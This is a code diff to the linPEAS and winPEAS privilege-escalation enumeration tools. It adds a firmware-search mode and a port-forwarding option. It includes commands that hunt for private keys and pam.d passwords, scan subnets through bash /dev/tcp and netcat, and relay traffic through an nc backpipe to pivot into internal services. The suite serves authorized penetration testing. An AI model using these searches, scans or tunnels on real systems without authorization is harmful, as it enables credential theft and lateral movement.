 NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so"
 
 #-- SI) Useful software
-if ! [ "SEARCH_IN_FOLDER" ]; then
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   print_2title "Useful software"
   for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done
   echo ""
 fi
 
 #-- SI) Search for compilers
-if ! [ "SEARCH_IN_FOLDER" ]; then
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   print_2title "Installed Compilers"
   (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/");
   echo ""
@@ -221,12 +221,18 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
   hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
   hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
   writable_agents=$(find /tmp /etc /home -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)
+else
+  sshconfig="$(ls ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null)"
+  hostsdenied="$(ls ${ROOT_FOLDER}etc/hosts.denied 2>/dev/null)"
+  hostsallow="$(ls ${ROOT_FOLDER}etc/hosts.allow 2>/dev/null)"
+  writable_agents=$(find  ${ROOT_FOLDER} -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)
 fi
 
 peass{SSH}
 
 grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
 
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   if [ "$TIMEOUT" ]; then
     privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
     privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
@@ -236,6 +242,10 @@ else
     privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
     privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
   fi
+else
+  # If $SEARCH_IN_FOLDER lets just search for private keys in the whole firmware
+  privatekeyfilesetc=$(timeout 120 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' "$ROOT_FOLDER" 2>/dev/null)
+fi
 
 if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
   echo ""
@@ -267,7 +277,7 @@ if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then
   ssh-add -l
   echo ""
 fi
-if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then
+if gpg-connect-agent "keyinfo --list" /bye 2>/dev/null | grep "D - - 1"; then
   print_3title "Listing gpg keys cached in gpg-agent"
   gpg-connect-agent "keyinfo --list" /bye
   echo ""
@@ -284,29 +294,29 @@ fi
 if [ "$hostsdenied" ]; then
   print_3title "/etc/hosts.denied file found, read the rules:"
   printf "$hostsdenied\n"
-  cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
+  cat " ${ROOT_FOLDER}etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
   echo ""
 fi
 if [ "$hostsallow" ]; then
   print_3title "/etc/hosts.allow file found, trying to read the rules:"
   printf "$hostsallow\n"
-  cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
+  cat " ${ROOT_FOLDER}etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
   echo ""
 fi
 if [ "$sshconfig" ]; then
   echo ""
   echo "Searching inside /etc/ssh/ssh_config for interesting info"
-  grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
+  grep -v "^#"  ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
 fi
 echo ""
 
 peass{PAM Auth}
 
 #-- SI) Passwords inside pam.d
-pamdpass=$(grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#")
+pamdpass=$(grep -Ri "passwd"  ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#")
 if [ "$pamdpass" ] || [ "$DEBUG" ]; then
   print_2title "Passwords inside pam.d"
-  grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
+  grep -Ri "passwd"  ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
   echo ""
 fi
 
@@ -558,6 +568,7 @@ peass{Cache Vi}
 peass{Wget}
 
 ##-- SI) containerd installed
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   containerd=$(command -v ctr)
   if [ "$containerd" ] || [ "$DEBUG" ]; then
     print_2title "Checking if containerd(ctr) is available"
@@ -568,8 +579,10 @@ if [ "$containerd" ] || [ "$DEBUG" ]; then
     fi
     echo ""
   fi
+fi
 
 ##-- SI) runc installed
+if ! [ "$SEARCH_IN_FOLDER" ]; then
   runc=$(command -v runc)
   if [ "$runc" ] || [ "$DEBUG" ]; then
     print_2title "Checking if runc is available"
@@ -579,6 +592,7 @@ if [ "$runc" ] || [ "$DEBUG" ]; then
     fi
     echo ""
   fi
+fi
 
 #-- SI) Docker
 if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then

linPEAS/builder/linpeas_parts/8_interesting_files.sh

@@ -279,14 +279,25 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
   fi
 fi
 
-##-- IF) Executable files added by user
+##-- IF) Date times inside firmware
-print_2title "Executable files added by user (limit 70)"
+if [ "$SEARCH_IN_FOLDER" ]; then
-if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "FIles datetimes inside the firmware (limit 50)"
-  find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort | tail -n 70
+  find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50
-else
+  echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"<date>\""
-  find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort | tail -n 70
+  echo ""
 fi
 
+##-- IF) Executable files added by user
+print_2title "Executable files potentially added by user (limit 70)"
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70
+else
+  find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70
+fi
+echo ""
+
+
+
 if [ "$MACPEAS" ]; then
   print_2title "Unsigned Applications"
   macosNotSigned /System/Applications
@@ -454,7 +465,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
 
   ##-- IF) Mail applications
   print_2title "Searching installed mail applications"
-  ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps"
+  ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq
   echo ""
 
   ##-- IF) Mails

linPEAS/builder/linpeas_parts/linpeas_base.sh

@@ -65,6 +65,7 @@ DEBUG=""
 AUTO_NETWORK_SCAN=""
 EXTRA_CHECKS=""
 REGEXES=""
+PORT_FORWARD=""
 THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")"
 [ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2
 [ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2
@@ -87,6 +88,9 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user,
         ${YELLOW}    -i <IP> [-p <PORT(s)>]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
         $GREEN     Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
       
+      ${GREEN}  Port forwarding:
+        ${YELLOW}    -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a port from a local IP to a remote IP
+      
       ${GREEN}  Firmware recon:
         ${YELLOW}    -f </FOLDER/PATH>${BLUE} Execute linpeas to search passwords/file permissions misconfigs inside a folder
 	
@@ -98,7 +102,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user,
 	${YELLOW}    -q${BLUE} Do not show banner
         ${YELLOW}    -N${BLUE} Do not use colours$NC"
 
-while getopts "h?asd:p:i:P:qo:LMwNDterf:" opt; do
+while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do
   case "$opt" in
     h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;;
     a)  FAST="";EXTRA_CHECKS="1";;
@@ -117,7 +121,15 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:" opt; do
     t)  AUTO_NETWORK_SCAN="1";;
     e)  EXTRA_CHECKS="1";;
     r)  REGEXES="1";;
-    f)  SEARCH_IN_FOLDER=$OPTARG; ROOT_FOLDER=$OPTARG; REGEXES="1"; CHECKS="software_information,interesting_files,api_keys_regex";;
+    f)  SEARCH_IN_FOLDER=$OPTARG;
+    	if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/"
+	  SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; 
+	fi;
+    	ROOT_FOLDER=$SEARCH_IN_FOLDER;
+	REGEXES="1";
+	CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_files,api_keys_regex";;
+	
+    F)  PORT_FORWARD=$OPTARG;;
     esac
 done
 
@@ -510,11 +522,11 @@ TIMEOUT="$(command -v timeout 2>/dev/null)"
 STRACE="$(command -v strace 2>/dev/null)"
 STRINGS="$(command -v strings 2>/dev/null)"
 
-shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
+shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
 
 notBackup="/tdbbackup$|/db_hotbackup$"
 
-cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart|"
+cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|"
 cronjobsB="centreon"
 
 processesVB='jdwp|tmux |screen | inspect |--inspect[= ]|--inspect$|--inpect-brk|--remote-debugging-port'
@@ -577,7 +589,7 @@ elif [ -f "/bin/bash" ] && ! [ -L "/bin/bash" ]; then
   FOUND_BASH="/bin/bash";
 fi
 if [ "$FOUND_BASH" ]; then
-  SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is available for network discovery & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)\n"
+  SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is available for network discovery, port scanning and port forwarding$LG ($SCRIPTNAME can discover hosts, scan ports, and forward ports. Learn more with -h)\n"
 fi
 
 FOUND_NC=$(command -v nc 2>/dev/null)
@@ -796,7 +808,7 @@ basic_net_info(){
 select_nc (){
   #Select the correct configuration of the netcat found
   NC_SCAN="$FOUND_NC -v -n -z -w 1"
-  $($FOUND_NC 127.0.0.1 65321 > /dev/null 2>&1)
+  $($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)
   if [ $? -eq 2 ]
   then
     NC_SCAN="timeout 1 $FOUND_NC -v -n"
@@ -826,8 +838,8 @@ tcp_recon (){
   for port in $PORTS; do
     for j in $(seq 1 254)
     do
-      if [ "$FOUND_BASH" ] && [ "$$TIMEOUT" ]; then
+      if [ "$FOUND_BASH" ] && [ "$TIMEOUT" ]; then
-        $TIMEOUT 5 $FOUND_BASH -c "(echo </dev/tcp/$IP3.$j/$port) 2>/dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$port\"" &
+        $TIMEOUT 2.5 $FOUND_BASH -c "(echo </dev/tcp/$IP3.$j/$port) 2>/dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$port\"" &
       elif [ "$NC_SCAN" ]; then
         ($NC_SCAN "$IP3"."$j" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") &
       fi
@@ -946,6 +958,24 @@ discovery_port_scan (){
 }
 
 
+port_forward (){
+  LOCAL_IP=$1
+  LOCAL_PORT=$2
+  REMOTE_IP=$3
+  REMOTE_PORT=$4
+
+  echo "In your local machine execute:"
+  echo "cd /tmp; rm backpipe; mknod backpipe p;"
+  echo "nc -lvnp $LOCAL_PORT 0<backpipe | nc -lvnp 9009 1>backpipe"
+  echo ""
+  echo "Press any key when you have executed the commands"
+  read -n 1
+
+  bash -c "exec 3<>/dev/tcp/$REMOTE_IP/$REMOTE_PORT; exec 4<>/dev/tcp/$LOCAL_IP/9009; cat <&3 >&4 & cat <&4 >&3 &"
+  echo "If not error was indicated, your local port $LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT"
+}
+
+
 ###########################################
 #---) Exporting history env variables (---#
 ###########################################
@@ -1031,12 +1061,46 @@ elif [ "$IP" ]; then
   exit 0
 fi
 
+if [ "$PORT_FORWARD" ]; then
+  if ! [ "$FOUND_BASH" ]; then
+    printf $RED"[-] Err: Port forwarding not possible, no bash in PATH\n"$NC;
+    exit 0
+  fi
+
+  LOCAL_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 1)"
+  LOCAL_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 2)"
+  REMOTE_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 3)"
+  REMOTE_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 4)"
+
+  if ! [ "$LOCAL_IP" ] || ! [ "$LOCAL_PORT" ] || ! [ "$REMOTE_IP" ] || ! [ "$REMOTE_PORT" ]; then
+    printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
+    exit 0
+  fi
+
+  #Check if LOCAL_PORT is a number
+  if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then
+    printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
+  fi
+
+  #Check if REMOTE_PORT is a number
+  if ! [ "$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then
+    printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
+  fi
+
+  port_forward "$LOCAL_IP" "$LOCAL_PORT" "$REMOTE_IP" "$REMOTE_PORT"
+  exit 0
+fi
+
 
 #Get HOMESEARCH
-HOMESEARCH="/home/ /Users/ /root/ $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " ")"
+if [ "$SEARCH_IN_FOLDER" ]; then
-if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users"; then #If not listed and not in /home, /Users/ or /root, add current home folder
+  HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/ ${ROOT_FOLDER}var/www/"
+else
+  HOMESEARCH="/home/ /Users/ /root/ /var/www $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users|^/var/www" | tr "\n" " ")"
+  if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users|^/var/www"; then #If not listed and not in /home, /Users/, /root, or /var/www add current home folder
     HOMESEARCH="$HOME $HOMESEARCH"
   fi
+fi
 GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|"
 
 

linPEAS/builder/src/linpeasBuilder.py

@@ -173,11 +173,11 @@ class LinpeasBuilder:
                     
                     if type == "d": 
                         find_line += "-type d "
-                        bash_find_var = f"FIND_DIR_{r[1:].replace('.','').replace('-','_').upper()}"
+                        bash_find_var = f"FIND_DIR_{r[1:].replace('.','').replace('-','_').replace('{ROOT_FOLDER}','').upper()}"
                         self.bash_find_d_vars.add(bash_find_var)
                         all_folder_regexes += regexes
                     else:
-                        bash_find_var = f"FIND_{r[1:].replace('.','').replace('-','_').upper()}"
+                        bash_find_var = f"FIND_{r[1:].replace('.','').replace('-','_').replace('{ROOT_FOLDER}','').upper()}"
                         self.bash_find_f_vars.add(bash_find_var)
                         all_file_regexes += regexes
 
@@ -275,7 +275,7 @@ class LinpeasBuilder:
         analise_line = ""
         if init:
             analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "'+frecord.regex+'"; fi; fi; '
-            analise_line += 'printf "%s" "$PSTORAGE_'+precord.bash_name+'" | grep -E "'+real_regex+'" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,'+real_regex+',${SED_RED},"; '
+            analise_line += 'printf "%s" "$PSTORAGE_'+precord.bash_name+'" | grep -E "'+real_regex+'" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,'+real_regex+',${SED_RED},"; '
 
         #If just list, just list the file/directory
         if frecord.just_list_file:
@@ -393,13 +393,13 @@ class LinpeasBuilder:
 
                 # If custom folder to search in
                 regexes_search_section += 'if [ "$SEARCH_IN_FOLDER" ]; then\n'
-                regexes_search_section += "  timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
+                regexes_search_section += "  timeout 120 find \"$ROOT_FOLDER\" -type f -not -path \"*/node_modules/*\" -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
                 
                 # If search in all the file system
                 regexes_search_section += 'else\n'
                 for path in paths_to_search:
                     grep_flags = "-HnRiIE" if caseinsensitive else "-HnRIE"
-                    regexes_search_section += "  timeout 120 find "+path+" -type f -exec grep "+grep_flags+" \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
+                    regexes_search_section += "  timeout 120 find "+path+" -type f -not -path \"*/node_modules/*\" -exec grep "+grep_flags+" \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
                 regexes_search_section += 'fi\n'
                 
                 regexes_search_section += "wait\n"

parsers/README.md

@@ -3,7 +3,7 @@
 These scripts allows you to transform the output of linpeas/macpeas/winpeas to JSON and then to PDF and HTML.
 
 ```python3
-python3 peass2json.py </path/to/executed_peass.out> </path/to/peass.json>
+python3 peas2json.py </path/to/executed_peass.out> </path/to/peass.json>
 python3 json2pdf.py </path/to/peass.json> </path/to/peass.pdf>
 python3 json2html.py </path/to/peass.json> </path/to/peass.html>
 ```

winPEAS/README.md

@@ -22,4 +22,4 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
 
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
-By Polop<sup>(TM)</sup>
+By Polop

winPEAS/winPEASbat/README.md

@@ -2,7 +2,7 @@
 
 ![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/images/winpeas.png)
 
-**WinPEAS is a script that searh for possible paths to escalate privileges on Windows hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)**
+**WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)**
 
 Check also the **Local Windows Privilege Escalation checklist** from [book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)
 

winPEAS/winPEASexe/README.md

@@ -85,6 +85,7 @@ searchpf             Search credentials via regex also in Program Files folders
 wait                 Wait for user input between checks
 debug                Display debugging information - memory usage, method execution time
 log[=logfile]        Log all output to file defined as logfile, or to "out.txt" if not specified
+MaxRegexFileSize=1000000        Max file size (in Bytes) to search regex in. Default: 1000000B
 
 Additional checks (slower):
 -lolbas              Run additional LOLBAS check
@@ -285,4 +286,4 @@ If you find any issue, please report it using **[github issues](https://github.c
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
 
-By Polop<sup>(TM)</sup>, makikvues (makikvues2[at]gmail[dot].com)
+By Polop

winPEAS/winPEASexe/Tests/Properties/AssemblyInfo.cs

@@ -1,5 +1,4 @@
 using System.Reflection;
-using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;
 
 // General Information about an assembly is controlled through the following

winPEAS/winPEASexe/winPEAS/App.config

@@ -3,4 +3,7 @@
     <startup useLegacyV2RuntimeActivationPolicy="true"> 
         
     <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2"/></startup>
+    <runtime>
+		<AppContextSwitchOverrides value="Switch.System.IO.UseLegacyPathHandling=false" />
+	</runtime>
 </configuration>

winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs

@@ -27,8 +27,8 @@ namespace winPEAS.Checks
             {
                 Beaprint.MainPrint("Current Active Window Application");
                 string title = ApplicationInfoHelper.GetActiveWindowTitle();
-                List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, winPEAS.Checks.Checks.CurrentUserSiDs);
+                List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, Checks.CurrentUserSiDs);
-                List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, winPEAS.Checks.Checks.CurrentUserSiDs);
+                List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, Checks.CurrentUserSiDs);
                 if (permsFile.Count > 0)
                 {
                     Beaprint.BadPrint("    " + title);
@@ -188,8 +188,8 @@ namespace winPEAS.Checks
 
                 foreach (Dictionary<string, string> sapp in scheduled_apps)
                 {
-                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], Checks.CurrentUserSiDs);
-                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], Checks.CurrentUserSiDs);
                     string formString = "    ({0}) {1}: {2}";
 
                     if (fileRights.Count > 0)
@@ -238,8 +238,8 @@ namespace winPEAS.Checks
                 foreach (var driver in DeviceDrivers.GetDeviceDriversNoMicrosoft())
                 {
                     string pathDriver = driver.Key;
-                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, Checks.CurrentUserSiDs);
-                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, Checks.CurrentUserSiDs);
 
                     Dictionary<string, string> colorsD = new Dictionary<string, string>()
                         {

winPEAS/winPEASexe/winPEAS/Checks/Checks.cs

@@ -35,6 +35,9 @@ namespace winPEAS.Checks
         public static string PaintActiveUsersNoAdministrator = "";
         public static string PaintDisabledUsers = "";
         public static string PaintDisabledUsersNoAdministrator = "";
+        public static bool IsLongPath = false;
+        public static bool WarningIsLongPath = false;
+        public static int MaxRegexFileSize = 1000000;
         //static string paint_lockoutUsers = "";
         public static string PaintAdminUsers = "";
         public static YamlConfig YamlConfig;
@@ -159,6 +162,16 @@ namespace winPEAS.Checks
                     SearchProgramFiles = true;
                 }
 
+                if (string.Equals(arg, "max-regex-file-size", StringComparison.CurrentCultureIgnoreCase))
+                {
+                    var parts = arg.Split('=');
+                    if (parts.Length >= 2 && !string.IsNullOrEmpty(parts[1]))
+                    {
+                        MaxRegexFileSize = Int32.Parse(parts[1]);
+                    }
+
+                }
+
                 if (string.Equals(arg, "-lolbas", StringComparison.CurrentCultureIgnoreCase))
                 {
                     IsLolbas = true;
@@ -206,6 +219,8 @@ namespace winPEAS.Checks
                         CheckRegANSI();
                     }
 
+                    CheckLongPath();
+
                     Beaprint.PrintInit();
 
                     CheckRunner.Run(CreateDynamicLists, IsDebug);
@@ -348,8 +363,8 @@ namespace winPEAS.Checks
             try
             {
                 Beaprint.GrayPrint("   - Creating disabled users list...");
-                Checks.PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
+                PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
